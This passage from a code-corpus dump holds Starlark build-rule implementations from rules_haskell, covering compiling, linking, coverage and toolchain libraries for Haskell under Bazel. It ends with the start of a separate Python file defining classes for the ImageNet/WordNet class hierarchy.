{}\"\"\".format(ctx.label))\n\n if not modules and ctx.attr.narrowed_deps:\n fail(\"\"\"The attribute \"narrowed_deps\" can only be used if \"modules\" is specified in {}\"\"\".format(ctx.label))\n\n # Note [Plugin order]\n plugin_decl = reversed(ctx.attr.plugins)\n non_default_plugin_decl = reversed(ctx.attr.non_default_plugins)\n all_plugin_decls = plugin_decl + non_default_plugin_decl\n\n plugin_dep_info = gather_dep_info(\n ctx.attr.name,\n [dep for plugin in all_plugin_decls for dep in plugin[GhcPluginInfo].deps],\n )\n package_ids = all_dependencies_package_ids(deps)\n\n # Add any interop info for other languages.\n cc = cc_interop_info(\n ctx,\n override_cc_toolchain = hs.tools_config.maybe_exec_cc_toolchain,\n )\n java = java_interop_info(deps)\n\n # Make shell tools available.\n posix = ctx.toolchains[\"@rules_sh//sh/posix:toolchain_type\"]\n\n # Determine file directories.\n interfaces_dir = paths.join(\"_iface\", hs.name)\n objects_dir = paths.join(\"_obj\", hs.name)\n\n with_profiling = is_profiling_enabled(hs)\n srcs_files, import_dir_map = _prepare_srcs(ctx.attr.srcs)\n main_as_haskell_module = is_main_as_haskell_module(modules, ctx.attr.main_function)\n module_map = determine_module_names(srcs_files, not main_as_haskell_module, ctx.attr.main_function, ctx.file.main_file)\n inspect_coverage = _should_inspect_coverage(ctx, hs, is_test)\n\n dynamic = not ctx.attr.linkstatic\n if with_profiling or hs.toolchain.static_runtime:\n # NOTE We can't have profiling and dynamic code at the\n # same time, see:\n # https://ghc.haskell.org/trac/ghc/ticket/15394\n # Also, static GHC doesn't support dynamic code\n dynamic = False\n\n module_outputs = build_haskell_modules(ctx, hs, cc, posix, \"\", with_profiling, dynamic, interfaces_dir, objects_dir)\n\n 
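    # module_outputs carries the per-module results of the haskell_module targets; its .os
    # field is a depset of object files that is linked below together with the objects
    # produced from "srcs".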
plugins = [resolve_plugin_tools(ctx, plugin[GhcPluginInfo]) for plugin in plugin_decl]\n non_default_plugins = [resolve_plugin_tools(ctx, plugin[GhcPluginInfo]) for plugin in non_default_plugin_decl]\n preprocessors = _resolve_preprocessors(ctx, ctx.attr.tools)\n user_compile_flags = _expand_make_variables(\"ghcopts\", ctx, ctx.attr.ghcopts)\n c = hs.toolchain.actions.compile_binary(\n hs,\n cc,\n java,\n posix,\n dep_info,\n plugin_dep_info,\n srcs = srcs_files,\n module_map = module_map,\n import_dir_map = import_dir_map,\n extra_srcs = depset(ctx.files.extra_srcs),\n user_compile_flags = user_compile_flags,\n dynamic = dynamic,\n with_profiling = with_profiling,\n interfaces_dir = interfaces_dir,\n objects_dir = objects_dir,\n main_function = ctx.attr.main_function,\n version = ctx.attr.version,\n inspect_coverage = inspect_coverage,\n plugins = plugins,\n non_default_plugins = non_default_plugins,\n preprocessors = preprocessors,\n )\n\n # gather intermediary code coverage instrumentation data\n coverage_data = c.coverage_data\n for dep in deps:\n if HaskellCoverageInfo in dep:\n coverage_data += dep[HaskellCoverageInfo].coverage_data\n coverage_data = list.dedup_on(_get_mix_filepath, coverage_data)\n\n user_compile_flags = _expand_make_variables(\"ghcopts\", ctx, ctx.attr.ghcopts)\n (binary, solibs) = link_binary(\n hs,\n cc,\n posix,\n all_deps_info,\n ctx.files.extra_srcs,\n user_compile_flags,\n c.object_files + c.dyn_object_files,\n module_outputs.os,\n dynamic = dynamic,\n with_profiling = with_profiling,\n version = ctx.attr.version,\n )\n\n hs_info = HaskellInfo(\n package_databases = all_deps_info.package_databases,\n version_macros = set.empty(),\n source_files = c.source_files,\n boot_files = c.boot_files,\n extra_source_files = c.extra_source_files,\n import_dirs = c.import_dirs,\n hs_libraries = all_deps_info.hs_libraries,\n deps_hs_libraries = all_deps_info.deps_hs_libraries,\n interface_dirs = all_deps_info.interface_dirs,\n deps_interface_dirs = all_deps_info.deps_interface_dirs,\n compile_flags = c.compile_flags,\n user_compile_flags = user_compile_flags,\n user_repl_flags = _expand_make_variables(\"repl_ghci_args\", ctx, ctx.attr.repl_ghci_args),\n )\n cc_info = cc_common.merge_cc_infos(\n cc_infos = [dep[CcInfo] for dep in deps if CcInfo in dep],\n )\n\n target_files = depset([binary])\n\n user_compile_flags = _expand_make_variables(\"ghcopts\", ctx, ctx.attr.ghcopts)\n extra_args = _expand_make_variables(\"runcompile_flags\", ctx, ctx.attr.runcompile_flags)\n build_haskell_runghc(\n hs,\n cc,\n posix,\n runghc_wrapper = ctx.file._ghci_repl_wrapper,\n extra_args = extra_args,\n user_compile_flags = user_compile_flags,\n output = ctx.outputs.runghc,\n package_databases = all_deps_info.package_databases,\n version = ctx.attr.version,\n hs_info = hs_info,\n )\n\n executable = binary\n extra_runfiles = []\n\n if inspect_coverage:\n binary_path = paths.join(ctx.workspace_name, binary.short_path)\n hpc_path = paths.join(ctx.workspace_name, hs.toolchain.tools.hpc.short_path)\n tix_file_path = hs.label.name + \".tix\"\n mix_file_paths = [\n paths.join(ctx.workspace_name, datum.mix_file.short_path)\n for datum in coverage_data\n ]\n mix_file_paths = collections.uniq(mix_file_paths) # remove duplicates\n\n # find which modules to exclude from coverage analysis, by using the specified source patterns\n raw_coverage_source_patterns = ctx.attr.experimental_coverage_source_patterns\n coverage_source_patterns = [parse_pattern(ctx, pat) for pat in raw_coverage_source_patterns]\n 
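        # Exclude any module whose mix file was produced by a target matching none of the
        # experimental_coverage_source_patterns, so the hpc report only covers requested sources.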
modules_to_exclude = [paths.split_extension(datum.mix_file.basename)[0] for datum in coverage_data if not _coverage_enabled_for_target(coverage_source_patterns, datum.target_label)]\n modules_to_exclude = collections.uniq(modules_to_exclude) # remove duplicates\n\n expected_covered_expressions_percentage = ctx.attr.expected_covered_expressions_percentage\n expected_uncovered_expression_count = ctx.attr.expected_uncovered_expression_count\n strict_coverage_analysis = ctx.attr.strict_coverage_analysis\n coverage_report_format = ctx.attr.coverage_report_format\n\n if coverage_report_format != \"text\" and coverage_report_format != \"html\":\n fail(\"\"\"haskell_test attribute \"coverage_report_format\" must be one of \"text\" or \"html\".\"\"\")\n\n wrapper = hs.actions.declare_file(\"{}_coverage/coverage_wrapper.sh\".format(ctx.label.name))\n ctx.actions.expand_template(\n template = ctx.file._coverage_wrapper_template,\n output = wrapper,\n substitutions = {\n \"{binary_path}\": shell.quote(binary_path),\n \"{hpc_path}\": shell.quote(hpc_path),\n \"{tix_file_path}\": shell.quote(tix_file_path),\n \"{expected_covered_expressions_percentage}\": shell.quote(str(expected_covered_expressions_percentage)),\n \"{expected_uncovered_expression_count}\": shell.quote(str(expected_uncovered_expression_count)),\n \"{mix_file_paths}\": shell.array_literal(mix_file_paths),\n \"{modules_to_exclude}\": shell.array_literal(modules_to_exclude),\n \"{strict_coverage_analysis}\": str(strict_coverage_analysis),\n \"{coverage_report_format}\": shell.quote(ctx.attr.coverage_report_format),\n \"{package_path}\": shell.quote(ctx.label.package),\n },\n is_executable = True,\n )\n executable = wrapper\n mix_runfiles = [datum.mix_file for datum in coverage_data]\n srcs_runfiles = [_condition_coverage_src(hs, datum.src_file) for datum in coverage_data]\n extra_runfiles = [\n ctx.file._bash_runfiles,\n hs.toolchain.tools.hpc,\n binary,\n ] + mix_runfiles + srcs_runfiles + java.inputs.to_list()\n\n return [\n hs_info,\n cc_info,\n DefaultInfo(\n executable = executable,\n files = target_files,\n runfiles = ctx.runfiles(\n files = extra_runfiles + solibs,\n collect_data = True,\n ),\n ),\n OutputGroupInfo(**compile_info_output_groups(\n name = ctx.label.name,\n workspace_name = ctx.workspace_name,\n hs = hs,\n cc = cc,\n c = c,\n posix = posix,\n runfiles = ctx.runfiles(collect_data = True).files,\n )),\n ]\n\ndef _create_empty_library(hs, cc, posix, my_pkg_id, with_shared, with_profiling, empty_libs_dir):\n \"\"\"See Note [Empty Libraries]\"\"\"\n dep_info = gather_dep_info(\"haskell_module-empty_lib\", [])\n empty_c = hs.actions.declare_file(\"empty.c\")\n hs.actions.write(empty_c, \"\")\n\n static_library = link_library_static(\n hs,\n cc,\n posix,\n dep_info,\n depset([empty_c]),\n my_pkg_id,\n with_profiling = with_profiling,\n libdir = empty_libs_dir,\n )\n libs = [static_library]\n\n if with_shared:\n dynamic_library = link_library_dynamic(\n hs,\n cc,\n posix,\n dep_info,\n depset(),\n depset([empty_c]),\n my_pkg_id,\n [],\n empty_libs_dir,\n )\n libs = [dynamic_library, static_library]\n\n return libs\n\ndef haskell_library_impl(ctx):\n hs = haskell_context(ctx)\n deps = ctx.attr.deps + ctx.attr.exports + ctx.attr.narrowed_deps\n dep_info = gather_dep_info(ctx.attr.name, ctx.attr.deps + ctx.attr.exports)\n narrowed_deps_info = gather_dep_info(ctx.attr.name, ctx.attr.narrowed_deps)\n all_deps_info = gather_dep_info(ctx.attr.name, deps)\n all_plugins = ctx.attr.plugins + ctx.attr.non_default_plugins\n 
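# Dependency information of the GHC plugins themselves, needed so that the compiler\n    # can load the plugins when building this library.\n    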
plugin_dep_info = gather_dep_info(\n ctx.attr.name,\n [dep for plugin in all_plugins for dep in plugin[GhcPluginInfo].deps],\n )\n package_ids = all_dependencies_package_ids(deps)\n\n modules = ctx.attr.modules\n if modules and ctx.files.srcs:\n fail(\"\"\"Only one of \"srcs\" or \"modules\" attributes must be specified in {}\"\"\".format(ctx.label))\n\n if not modules and ctx.attr.narrowed_deps:\n fail(\"\"\"The attribute \"narrowed_deps\" is enabled only if \"modules\" is specified in {}\"\"\".format(ctx.label))\n\n # Add any interop info for other languages.\n cc = cc_interop_info(\n ctx,\n override_cc_toolchain = hs.tools_config.maybe_exec_cc_toolchain,\n )\n java = java_interop_info(ctx.attr.deps + ctx.attr.narrowed_deps)\n\n # Make shell tools available.\n posix = ctx.toolchains[\"@rules_sh//sh/posix:toolchain_type\"]\n\n with_profiling = is_profiling_enabled(hs)\n srcs_files, import_dir_map = _prepare_srcs(ctx.attr.srcs)\n module_map = determine_module_names(srcs_files)\n\n package_name = getattr(ctx.attr, \"package_name\", None)\n version = getattr(ctx.attr, \"version\", None)\n my_pkg_id = pkg_id.new(ctx.label, package_name, version)\n\n # If we're compiling a package, put the interfaces inside the\n # package directory.\n interfaces_dir = paths.join(pkg_id.to_string(my_pkg_id), \"_iface\")\n objects_dir = paths.join(\"_obj\", hs.name)\n\n non_empty = srcs_files or modules\n\n with_shared = not ctx.attr.linkstatic\n if with_profiling or hs.toolchain.static_runtime:\n # NOTE We can't have profiling and dynamic code at the\n # same time, see:\n # https://ghc.haskell.org/trac/ghc/ticket/15394\n # Also, static GHC doesn't support dynamic code\n with_shared = False\n\n module_outputs = build_haskell_modules(ctx, hs, cc, posix, pkg_id.to_string(my_pkg_id), with_profiling, with_shared, interfaces_dir, objects_dir)\n\n plugins = [resolve_plugin_tools(ctx, plugin[GhcPluginInfo]) for plugin in ctx.attr.plugins]\n non_default_plugins = [resolve_plugin_tools(ctx, plugin[GhcPluginInfo]) for plugin in ctx.attr.non_default_plugins]\n preprocessors = _resolve_preprocessors(ctx, ctx.attr.tools)\n user_compile_flags = _expand_make_variables(\"ghcopts\", ctx, ctx.attr.ghcopts)\n c = hs.toolchain.actions.compile_library(\n hs,\n cc,\n java,\n posix,\n dep_info,\n plugin_dep_info,\n srcs = srcs_files,\n module_map = module_map,\n import_dir_map = import_dir_map,\n extra_srcs = depset(ctx.files.extra_srcs),\n user_compile_flags = user_compile_flags,\n with_shared = with_shared,\n with_profiling = with_profiling,\n interfaces_dir = interfaces_dir,\n objects_dir = objects_dir,\n my_pkg_id = my_pkg_id,\n plugins = plugins,\n non_default_plugins = non_default_plugins,\n preprocessors = preprocessors,\n )\n\n other_modules = ctx.attr.hidden_modules\n exposed_modules_reexports = _exposed_modules_reexports(ctx.attr.reexported_modules)\n haskell_module_names = [haskell_module_from_target(m) for m in modules]\n exposed_modules = set.from_list(module_map.keys() + exposed_modules_reexports + haskell_module_names)\n set.mutable_difference(exposed_modules, set.from_list(other_modules))\n exposed_modules = set.to_list(exposed_modules)\n\n if non_empty:\n static_library = link_library_static(\n hs,\n cc,\n posix,\n all_deps_info,\n depset(c.object_files, transitive = [module_outputs.os]),\n my_pkg_id,\n with_profiling = with_profiling,\n )\n else:\n static_library = None\n\n if with_shared and non_empty:\n dynamic_library = link_library_dynamic(\n hs,\n cc,\n posix,\n all_deps_info,\n depset(ctx.files.extra_srcs),\n 
depset(c.dyn_object_files, transitive = [module_outputs.dyn_os]),\n my_pkg_id,\n user_compile_flags,\n )\n else:\n dynamic_library = None\n\n conf_file, cache_file = package(\n hs,\n cc,\n posix,\n all_deps_info,\n with_shared,\n exposed_modules,\n other_modules,\n my_pkg_id,\n non_empty,\n )\n\n empty_libs_dir = \"empty_libs\"\n conf_file_empty, cache_file_empty = package(\n hs,\n cc,\n posix,\n all_deps_info,\n with_shared,\n exposed_modules,\n other_modules,\n my_pkg_id,\n non_empty,\n empty_libs_dir,\n )\n\n interface_dirs = depset(\n direct = c.interface_files,\n transitive = [all_deps_info.interface_dirs, module_outputs.his, module_outputs.dyn_his],\n )\n\n version_macros = set.empty()\n if version:\n package_name = hs.name\n if hasattr(ctx.attr, \"package_name\") and ctx.attr.package_name:\n package_name = ctx.attr.package_name\n version_macros = set.singleton(\n generate_version_macros(ctx, package_name, version),\n )\n\n empty_libs = _create_empty_library(hs, cc, posix, my_pkg_id, with_shared, with_profiling, empty_libs_dir)\n\n export_infos = gather_dep_info(ctx.attr.name, ctx.attr.exports)\n hs_info = HaskellInfo(\n package_databases = depset([cache_file], transitive = [all_deps_info.package_databases]),\n empty_lib_package_databases = depset(\n direct = [cache_file_empty],\n transitive = [\n dep_info.package_databases,\n narrowed_deps_info.empty_lib_package_databases,\n export_infos.empty_lib_package_databases,\n ],\n ),\n version_macros = version_macros,\n source_files = c.source_files,\n boot_files = c.boot_files,\n extra_source_files = c.extra_source_files,\n import_dirs = set.mutable_union(c.import_dirs, export_infos.import_dirs),\n hs_libraries = depset(\n direct = [lib for lib in [static_library, dynamic_library] if lib],\n transitive = [all_deps_info.hs_libraries],\n ),\n deps_hs_libraries = depset(\n transitive = [dep_info.hs_libraries, narrowed_deps_info.deps_hs_libraries],\n ),\n empty_hs_libraries = depset(\n direct = empty_libs,\n transitive = [all_deps_info.empty_hs_libraries, export_infos.empty_hs_libraries],\n ),\n interface_dirs = depset(transitive = [interface_dirs, export_infos.interface_dirs]),\n deps_interface_dirs = depset(transitive = [dep_info.interface_dirs, narrowed_deps_info.deps_interface_dirs]),\n compile_flags = c.compile_flags,\n user_compile_flags = user_compile_flags,\n user_repl_flags = _expand_make_variables(\"repl_ghci_args\", ctx, ctx.attr.repl_ghci_args),\n per_module_transitive_interfaces = module_outputs.per_module_transitive_interfaces,\n per_module_transitive_objects = module_outputs.per_module_transitive_objects,\n )\n\n exports = [\n reexp[HaskellLibraryInfo]\n for reexp in ctx.attr.exports\n if HaskellCoverageInfo in reexp\n ]\n lib_info = HaskellLibraryInfo(\n package_id = pkg_id.to_string(my_pkg_id),\n version = version,\n exports = exports,\n )\n\n dep_coverage_data = []\n for dep in deps:\n if HaskellCoverageInfo in dep:\n dep_coverage_data += dep[HaskellCoverageInfo].coverage_data\n\n coverage_data = dep_coverage_data + c.coverage_data\n coverage_data = list.dedup_on(_get_mix_filepath, coverage_data)\n\n coverage_info = HaskellCoverageInfo(\n coverage_data = coverage_data,\n )\n\n target_files = depset([file for file in [static_library, dynamic_library] if file])\n\n if hasattr(ctx, \"outputs\"):\n extra_args = _expand_make_variables(\"runcompile_flags\", ctx, ctx.attr.runcompile_flags)\n user_compile_flags = _expand_make_variables(\"ghcopts\", ctx, ctx.attr.ghcopts)\n build_haskell_runghc(\n hs,\n cc,\n posix,\n runghc_wrapper = 
ctx.file._ghci_repl_wrapper,\n extra_args = extra_args,\n user_compile_flags = user_compile_flags,\n output = ctx.outputs.runghc,\n package_databases = all_deps_info.package_databases,\n version = ctx.attr.version,\n hs_info = hs_info,\n lib_info = lib_info,\n )\n\n default_info = None\n\n if hasattr(ctx, \"runfiles\"):\n default_info = DefaultInfo(\n files = target_files,\n runfiles = ctx.runfiles(transitive_files = java.inputs, collect_data = True),\n )\n else:\n default_info = DefaultInfo(\n files = target_files,\n )\n\n # Create a CcInfo provider so that CC rules can work with\n # a haskell library as if it was a regular CC one.\n\n # XXX: protobuf is passing a \"patched ctx\"\n # which includes the real ctx as \"real_ctx\"\n real_ctx = getattr(ctx, \"real_ctx\", ctx)\n cc_toolchain = find_cc_toolchain(real_ctx)\n feature_configuration = cc_common.configure_features(\n ctx = real_ctx,\n cc_toolchain = cc_toolchain,\n requested_features = ctx.features,\n unsupported_features = ctx.disabled_features,\n )\n if dynamic_library or static_library:\n linker_inputs = [\n cc_common.create_linker_input(\n owner = ctx.label,\n libraries = depset(direct = [\n cc_common.create_library_to_link(\n actions = ctx.actions,\n feature_configuration = feature_configuration,\n dynamic_library = dynamic_library,\n dynamic_library_symlink_path = dynamic_library.basename if dynamic_library else \"\",\n static_library = static_library,\n cc_toolchain = cc_toolchain,\n ),\n ]),\n ),\n ]\n else:\n linker_inputs = []\n compilation_context = cc_common.create_compilation_context()\n linking_context = cc_common.create_linking_context(\n linker_inputs = depset(direct = linker_inputs),\n )\n out_cc_info = cc_common.merge_cc_infos(\n cc_infos = [\n CcInfo(\n compilation_context = compilation_context,\n linking_context = linking_context,\n ),\n ] + [dep[CcInfo] for dep in deps if CcInfo in dep],\n )\n\n return [\n hs_info,\n out_cc_info,\n coverage_info,\n default_info,\n lib_info,\n OutputGroupInfo(**dicts.add(\n compile_info_output_groups(\n # For haskell_proto_aspect, which doesn't have a ctx.workspace_name,\n # just set it to \"\". It won't matter in practice because those rules don't\n # have runfiles and won't be compiled directly anyway.\n workspace_name = getattr(ctx, \"workspace_name\", \"\"),\n hs = hs,\n cc = cc,\n name = ctx.label.name,\n c = c,\n posix = posix,\n runfiles = default_info.default_runfiles.files if getattr(default_info, \"default_runfiles\", None) else depset(),\n ),\n library_info_output_groups(\n name = ctx.label.name,\n hs = hs,\n hs_info = hs_info,\n lib_info = lib_info,\n ),\n )),\n ]\n\n# We should not need this provider. It exists purely as a workaround\n# for https://github.com/bazelbuild/bazel/issues/8129.\n#\n# TODO Get rid of this by computing a CcInfo in haskell_import\n# instead. 
Currently blocked on upstream.\nHaskellImportHack = provider()\nHaskellToolchainLibraries = provider()\n\ndef haskell_toolchain_library_impl(ctx):\n hs = haskell_context(ctx)\n if ctx.attr.package:\n package = ctx.attr.package\n else:\n package = ctx.label.name\n\n libraries = ctx.attr._toolchain_libraries[HaskellToolchainLibraries].libraries\n target = libraries.get(package)\n\n if not target:\n fail(\n \"\"\"\n{} is not a toolchain library.\nCheck that it ships with your version of GHC.\nThe following toolchain libraries are available:\n{}\n \"\"\".format(package, libraries),\n )\n\n return [\n target.default_info,\n target.hs_info,\n target.hs_lib_info,\n target.cc_info,\n target.haddock_info,\n HaskellToolchainLibraryInfo(),\n OutputGroupInfo(**library_info_output_groups(\n hs = hs,\n name = ctx.label.name,\n hs_info = target.hs_info,\n lib_info = target.hs_lib_info,\n )),\n ]\n\ndef _toolchain_library_symlink(dynamic_library):\n prefix = dynamic_library.owner.workspace_root.replace(\"_\", \"_U\").replace(\"/\", \"_S\")\n basename = dynamic_library.basename\n return paths.join(prefix, basename)\n\ndef haskell_toolchain_libraries_impl(ctx):\n hs = haskell_context(ctx)\n with_profiling = is_profiling_enabled(hs)\n with_threaded = \"-threaded\" in hs.toolchain.ghcopts\n\n cc_toolchain = find_cc_toolchain(ctx)\n feature_configuration = cc_common.configure_features(\n ctx = ctx,\n cc_toolchain = cc_toolchain,\n requested_features = ctx.features,\n unsupported_features = ctx.disabled_features,\n )\n\n libraries = hs.toolchain.libraries\n\n # List of library in left-to-right post-ordering\n # Meaning, if package B depends on package A, then A will appear before B.\n ordered = depset(transitive = [\n target[HaskellImportHack].transitive_depends\n for target in hs.toolchain.libraries.values()\n ])\n\n library_dict = {}\n for package in ordered.to_list():\n target = libraries[package]\n\n # Construct CcInfo\n additional_link_inputs = []\n if with_profiling:\n # GHC does not provide dynamic profiling mode libraries. The dynamic\n # libraries that are available are missing profiling symbols, that\n # other profiling mode build results will reference. Therefore, we\n # don't import dynamic libraries in profiling mode.\n libs = {\n get_static_hs_lib_name(hs.toolchain.version, lib): {\"static\": lib}\n for lib in target[HaskellImportHack].static_profiling_libraries.to_list()\n }\n else:\n # Workaround for https://github.com/tweag/rules_haskell/issues/881\n # Static and dynamic libraries don't necessarily pair up 1 to 1.\n # E.g. the rts package in the Unix GHC bindist contains the\n # dynamic libHSrts and the static libCffi and libHSrts.\n libs = {}\n for lib in target[HaskellImportHack].dynamic_libraries.to_list():\n libname = get_dynamic_hs_lib_name(hs.toolchain.version, lib)\n if libname == \"ffi\" and libname in libs:\n # Make sure that the file of libffi matching its soname\n # ends up in target runfiles. Otherwise, execution will\n # fail with \"cannot open shared object file\" errors.\n # On Linux libffi comes in three shapes:\n # libffi.so, libffi.so.7, libffi.so.7.1.0\n # (version numbers may vary)\n # The soname is then libffi.so.7, meaning, at runtime the\n # dynamic linker will look for libffi.so.7. 
So, that file\n # should be the LibraryToLink.dynamic_library.\n ext_components = get_lib_extension(lib).split(\".\")\n if len(ext_components) == 2 and ext_components[0] == \"so\":\n libs[libname][\"dynamic\"] = lib\n else:\n libs[libname] = {\"dynamic\": lib}\n for lib in target[HaskellImportHack].static_libraries.to_list():\n name = get_static_hs_lib_name(with_profiling, lib)\n entry = libs.get(name, {})\n entry[\"static\"] = lib\n libs[name] = entry\n\n # Avoid duplicate runtime and ffi libraries. These libraries come\n # in threaded and non-threaded flavors. Depending on the\n # compilation mode we want to forward only one or the other.\n # XXX: Threaded mode should be a per-target property. Use Bazel\n # build configurations and transitions to select the threaded or\n # non-threaded runtime and ffi on a per-target basis.\n if \"HSrts_thr\" in libs:\n if with_threaded:\n libs[\"HSrts\"] = libs[\"HSrts_thr\"]\n libs.pop(\"HSrts_thr\")\n if \"Cffi_thr\" in libs:\n if with_threaded:\n libs[\"ffi\"][\"static\"] = libs[\"Cffi_thr\"][\"static\"]\n libs.pop(\"Cffi_thr\")\n linker_inputs = [\n cc_common.create_linker_input(\n owner = ctx.label,\n libraries = depset(direct = [\n cc_common.create_library_to_link(\n actions = ctx.actions,\n feature_configuration = feature_configuration,\n dynamic_library = lib.get(\"dynamic\", None),\n dynamic_library_symlink_path =\n _toolchain_library_symlink(lib[\"dynamic\"]) if lib.get(\"dynamic\") else \"\",\n static_library = lib.get(\"static\", None),\n cc_toolchain = cc_toolchain,\n )\n for lib in libs.values()\n ]),\n user_link_flags = depset(direct = target[HaskellImportHack].linkopts),\n ),\n ]\n compilation_context = cc_common.create_compilation_context(\n headers = target[HaskellImportHack].headers,\n includes = target[HaskellImportHack].includes,\n )\n linking_context = cc_common.create_linking_context(\n linker_inputs = depset(direct = linker_inputs),\n )\n cc_info = CcInfo(\n compilation_context = compilation_context,\n linking_context = linking_context,\n )\n library_dict[package] = struct(\n default_info = target[DefaultInfo],\n hs_info = target[HaskellInfo],\n hs_lib_info = target[HaskellLibraryInfo],\n cc_info = cc_common.merge_cc_infos(cc_infos = [cc_info] + [\n library_dict[dep].cc_info\n for dep in target[HaskellImportHack].depends\n ]),\n haddock_info = target[HaddockInfo],\n )\n\n return [HaskellToolchainLibraries(libraries = library_dict)]\n\nhaskell_toolchain_libraries = rule(\n haskell_toolchain_libraries_impl,\n attrs = {\n \"_cc_toolchain\": attr.label(\n default = Label(\"@rules_cc//cc:current_cc_toolchain\"),\n ),\n },\n toolchains = [\n \"@rules_cc//cc:toolchain_type\",\n \"@rules_haskell//haskell:toolchain\",\n ],\n fragments = [\"cpp\"],\n)\n\"\"\"Generate Haskell toolchain libraries.\n\nThis is an internal rule and should not be user facing.\n\nThis rule is a work-around for toolchain transitions not being implemented,\nyet. See\nhttps://github.com/bazelbuild/proposals/blob/master/designs/2019-02-12-toolchain-transitions.md\nThis will need to be revisited once that proposal is implemented.\n\"\"\"\n\ndef haskell_import_impl(ctx):\n # The `allow_files` attribute of `rule` cannot define patterns of accepted\n # file extensions like `.so.*`. 
Instead, we check for the correct file\n # extensions here.\n for lib in ctx.files.shared_libraries:\n msg = \"in shared_libraries attribute of haskell_import rule {}: \" + \\\n \"source file '{}' is misplaced here \" + \\\n \"(expected .dll, .dylib, .so or .so.*)\"\n ext = get_lib_extension(lib)\n if not (ext in [\"dll\", \"dylib\", \"so\"] or ext.startswith(\"so.\")):\n fail(msg.format(str(ctx.label), str(lib.short_path)))\n\n id = ctx.attr.id or ctx.attr.name\n target_files = [\n file\n for file in ctx.files.static_libraries + ctx.files.shared_libraries\n ]\n version_macros = set.empty()\n if ctx.attr.version != None:\n version_macros = set.singleton(\n generate_version_macros(ctx, ctx.label.name, ctx.attr.version),\n )\n hs_info = HaskellInfo(\n # XXX Empty set of conf and cache files only works for global db.\n package_databases = depset(),\n empty_lib_package_databases = depset(),\n version_macros = version_macros,\n source_files = depset(),\n boot_files = depset(),\n extra_source_files = depset(),\n import_dirs = set.empty(),\n hs_libraries = depset(),\n deps_hs_libraries = depset(),\n empty_hs_libraries = depset(),\n interface_dirs = depset(),\n deps_interface_dirs = depset(),\n compile_flags = [],\n user_compile_flags = [],\n user_repl_flags = [],\n )\n import_info = HaskellImportHack(\n # Make sure we're using the same order for dynamic_libraries,\n # static_libraries.\n dynamic_libraries = depset(ctx.files.shared_libraries),\n static_libraries = depset(ctx.files.static_libraries, order = \"topological\"),\n # NOTE: haskell_import is evaluated as a toolchain rule. Even if we\n # bazel build with -c dbg, this rule is still executed with\n # ctx.var[\"COMPILATION_MODE\"] == \"opt\". Therefore, we need to carry\n # both profiling and non-profiling libraries forward so that a later\n # haskell_toolchain_library can select the appropriate artifacts.\n static_profiling_libraries = depset(ctx.files.static_profiling_libraries, order = \"topological\"),\n headers = depset(ctx.files.hdrs),\n includes = depset(ctx.attr.includes),\n linkopts = ctx.attr.linkopts,\n depends = [dep.label.name for dep in ctx.attr.deps],\n transitive_depends = depset(\n direct = [ctx.attr.name],\n transitive = [dep[HaskellImportHack].transitive_depends for dep in ctx.attr.deps],\n order = \"postorder\",\n ),\n )\n\n coverage_info = HaskellCoverageInfo(coverage_data = [])\n lib_info = HaskellLibraryInfo(\n package_id = id,\n version = ctx.attr.version,\n exports = [],\n )\n default_info = DefaultInfo(\n files = depset(target_files),\n )\n\n # This package haddock informations\n transitive_html = {id: ctx.file.haddock_html} if ctx.file.haddock_html else {}\n transitive_haddocks = {id: ctx.files.haddock_interfaces}\n\n # Add dependencies haddock informations\n for dep in ctx.attr.deps:\n transitive_html.update(dep[HaddockInfo].transitive_html)\n transitive_haddocks.update(dep[HaddockInfo].transitive_haddocks)\n\n haddock_info = HaddockInfo(\n package_id = id,\n transitive_html = transitive_html,\n transitive_haddocks = transitive_haddocks,\n )\n\n return [\n hs_info,\n import_info,\n coverage_info,\n default_info,\n lib_info,\n haddock_info,\n ]\n\ndef _exposed_modules_reexports(reexported_modules):\n \"\"\"Creates a ghc-pkg-compatible list of reexport declarations.\n\n A ghc-pkg registration file declares reexports as part of the\n exposed-modules field in the following format:\n\n exposed-modules: A, B, C from pkg-c:C, D from pkg-d:Original.D\n\n Here, the Original.D module from pkg-d is renamed by virtue of a\n 
different name being used before the \"from\" keyword.\n\n This function creates a ghc-pkg-compatible list of reexport declarations\n (as shown above) from a dictionary mapping package targets to \"Cabal-style\"\n reexported-modules declarations. That is, something like:\n\n {\n \":pkg-c\": \"C\",\n \":pkg-d\": \"Original.D as D\",\n \":pkg-e\": \"E1, Original.E2 as E2\",\n }\n\n Args:\n reexported_modules: a dictionary mapping package targets to \"Cabal-style\"\n reexported-modules declarations.\n\n Returns:\n a ghc-pkg-compatible list of reexport declarations.\n \"\"\"\n exposed_reexports = []\n for dep, cabal_decls in reexported_modules.items():\n for cabal_decl in cabal_decls.split(\",\"):\n stripped_cabal_decl = cabal_decl.strip()\n cabal_decl_parts = stripped_cabal_decl.split(\" as \")\n original = cabal_decl_parts[0]\n if len(cabal_decl_parts) == 2:\n reexported = cabal_decl_parts[1]\n else:\n reexported = cabal_decl_parts[0]\n if HaskellLibraryInfo in dep:\n pkg = dep[HaskellLibraryInfo].package_id\n exposed_reexport = \"{reexported} from {pkg}:{original}\".format(\n reexported = reexported,\n pkg = pkg,\n original = original,\n )\n exposed_reexports.append(exposed_reexport)\n\n return exposed_reexports\n\ndef _get_mix_filepath(coverage_datum):\n \"\"\" Extracts mix file path from a coverage datum.\n \"\"\"\n return coverage_datum.mix_file.short_path\n"} {"ext": "py", "sha": "1a3125d04d238348d257b41efc876f7e003b2f23", "content": "import os\nimport numpy as np\nimport json\nfrom itertools import product\n\n\n\nclass Node():\n '''\n Class for representing a node in the ImageNet/WordNet hierarchy. \n '''\n def __init__(self, wnid, parent_wnid=None, name=\"\"):\n \"\"\"\n Args:\n wnid (str) : WordNet ID for synset represented by node\n parent_wnid (str) : WordNet ID for synset of node's parent\n name (str) : word/human-interpretable description of synset \n \"\"\"\n\n self.wnid = wnid\n self.name = name\n self.class_num = -1\n self.parent_wnid = parent_wnid\n self.descendant_count_in = 0\n self.descendants_all = set()\n \n def add_child(self, child):\n \"\"\"\n Add child to given node.\n\n Args:\n child (Node) : Node object for child\n \"\"\"\n child.parent_wnid = self.wnid\n \n def __str__(self):\n return f'Name: ({self.name}), ImageNet Class: ({self.class_num}), Descendants: ({self.descendant_count_in})'\n \n def __repr__(self):\n return f'Name: ({self.name}), ImageNet Class: ({self.class_num}), Descendants: ({self.descendant_count_in})'\n\nclass ImageNetHierarchy():\n '''\n Class for representing ImageNet/WordNet hierarchy. 
